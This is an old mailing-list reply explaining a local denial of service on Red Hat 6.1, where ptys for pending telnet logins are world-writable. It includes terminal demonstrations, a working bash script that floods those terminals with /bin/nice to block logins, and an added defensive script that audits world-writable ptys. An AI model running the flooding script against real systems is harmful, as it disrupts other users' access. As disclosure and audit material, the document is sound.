>
> I did.  Does it require root access to work?  I checked out a redhat box and saw the following permissions in /dev/pts:
>
> crw--w----   1 dcavanau tty      136,   0 Jan 31 02:12 0
> crw-------   1 lpman    tty      136,   1 Jan 31 14:37 1
> crw--w----   1 alan     tty      136,   2 Jan 31 14:37 2
> crw--w----   1 jb       tty      136,   3 Jan 30 15:36 3
> crw--w----   1 phil     tty      136,   4 Jan 30 16:28 4
> crw--w----   1 phil     tty      136,   5 Jan 28 13:01 5
> crw--w----   1 alan     tty      136,   6 Jan 31 14:37 6
>
> How can /bin/nice be catted there with those permissions?
>
> -lineman

Well, first off, I am sorry for responding so late. Since I am not any good at
expressing myself, you haven't seen the "vulnerability". The thing is,
when a user telnets to another host, a new tty will immediately be put
in /dev/pts/, and it will be writable for everyone. After the user
has logged in, it will NOT. So all this program does is flood the
tty while the user is trying to log in, making it hard for the user to log in.

An example:

First, user "frank" connects to localhost with telnet

[frank@localhost frank]$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.14 on an i686
login:

Then, let's have a look in /dev/pts as user john:

[john@localhost john]$ id
uid=504(john) gid=504(john) groups=504(john)
[john@localhost john]$ cd /dev/pts/
[john@localhost pts]$ ls -la
total 36
drwxr-xr-x   2 root     root            0 Feb  3 20:32 ./
drwxr-xr-x   5 root     root        36864 Feb  3 20:33 ../
crw--w--w-   1 root     root     136,   0 Feb  3 20:40 0
[john@localhost pts]$

After user "frank" _has_ logged in, his terminal will not be writable by
everyone!

[frank@localhost frank]$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.14 on an i686
login: frank
Password:
Last login: Wed Feb  3 20:41:54 from localhost

[frank@localhost frank]$

Then as user "john" we have a look:

[john@localhost pts]$ ls -la
total 36
drwxr-xr-x   2 root     root            0 Feb  3 20:32 ./
drwxr-xr-x   5 root     root        36864 Feb  3 20:33 ../
crw--w----   1 frank   tty      136,   0 Feb  3 20:42 0
[john@localhost pts]$

----

After it is executed, it will constantly watch /dev/pts,
and when someone tries to log in using telnet, /bin/nice will be cat'ed
into the terminal. This is only possible with telnet, because ssh, rsh, rlogin,
etc. will not put a terminal in /dev/pts before the user has logged in.

So to answer your question, a user does not have to have uid 0.

Try the stupid script now and see: first run the script, then try to
log in.

Sincerely yours,

cosa nostra

----------------


#!/bin/bash

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=$(tty)            # To prevent flooding of one's own TTY

#c0sa_n0stra@yahoo.com

clear
echo
echo
echo "This c0w has found a	   (__) "
echo "really nice place and        /oo\\############### "
echo "he wants it all for          \\  /################\\ "
echo "himself!              m000h'  \\/ ################ | "
echo "                                  ################ | "
echo "                                  ################ | "
echo "cOsa_nOstra anno 2000       	################ "
echo "                                   ||         || "
echo "                                  ^ ^        ^ ^ "
echo
echo "*this c0w will let n0 other c0w eat his gr4ss*"
echo
echo

# Loop forever over every entry in /dev/pts. A pty that is a character
# device and writable by us (the pre-login state shown above) gets
# /bin/nice dumped into it; our own terminal is skipped. Variables are
# quoted so a "not a tty" result from tty cannot break the test.
while /bin/true ; do
    for i in "$TTYDIR"/* ; do
        if [ -w "$i" ] && [ -c "$i" ] && [ "$i" != "$MYTTY" ]; then
            cat "$NONSENSE" > "$i"
        fi
    done
done

unset i
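An added audit script, not part of the original post or its author's code: instead of testing whether the current user can write to each pty (the `-w` test the flooder uses), it reads the mode bits of every entry in /dev/pts and reports the ones writable by everyone, i.e. the pre-login `crw--w--w- root root` state the post's listing shows, as opposed to the post-login `crw--w---- <user> tty` state. It assumes only POSIX sh and `ls -ld`; the directory is a parameter so the function can be exercised on ordinary files in a scratch directory, which is what the check below does.

```shell
#!/bin/sh
# Added example (not from the original post): list entries of a pts
# directory whose mode has the other-write bit set, together with the
# owner, so a non-root user can see which slots are in the world-writable
# pre-login state. Defaults to /dev/pts; any directory may be given so
# the function can be tried on regular files without real ptys.

# Print "name owner mode" for every entry in $1 that is writable by
# everyone. Parses ls -ld output (field 1 = mode, field 3 = owner) so it
# needs no GNU stat; the 9th character of the mode string is other-write.
world_writable_ttys() {
    dir=${1:-/dev/pts}
    for f in "$dir"/*; do
        [ -e "$f" ] || continue            # empty directory: glob stays literal
        set -- $(ls -ld "$f")              # $1 = mode, $3 = owner
        mode=$1
        owner=$3
        case $mode in
            ????????w*) printf '%s %s %s\n' "${f##*/}" "$owner" "$mode" ;;
        esac
    done
}

# When run as a script, audit /dev/pts (or the directory given as $1).
world_writable_ttys "${1:-/dev/pts}"
```

On a box in the state the post describes, a telnet session sitting at the `login:` prompt shows up as `0 root crw--w--w-`, and disappears from the output once the user has authenticated and the slot has been chowned to them with mode 0620.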


